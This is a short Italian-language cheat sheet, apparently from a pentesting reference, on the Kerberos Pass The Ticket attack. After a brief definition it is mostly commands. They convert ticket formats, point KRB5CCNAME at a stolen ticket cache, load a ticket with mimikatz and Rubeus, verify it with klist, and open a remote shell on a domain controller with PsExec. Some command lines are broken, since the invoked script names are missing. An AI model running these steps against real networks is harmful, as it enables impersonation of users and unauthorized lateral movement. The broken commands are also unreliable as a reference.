Pass The Ticket (PTT)

Nel metodo di attacco Pass The Ticket (PTT), gli attaccanti rubano il biglietto di autenticazione di un utente invece della sua password o dei valori hash. Questo biglietto rubato viene poi utilizzato per fingere di essere l'utente, ottenendo accesso non autorizzato a risorse e servizi all'interno di una rete.


Scambio di biglietti Linux e Windows tra piattaforme

Lo strumento ticket_converter converte i formati dei biglietti utilizzando solo il biglietto stesso e un file di output.

python velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

In Windows Kekeo può essere utilizzato.

Attacco Pass The Ticket

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python jurassic.park/trex@labwws02.jurassic.park -k -no-pass
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd


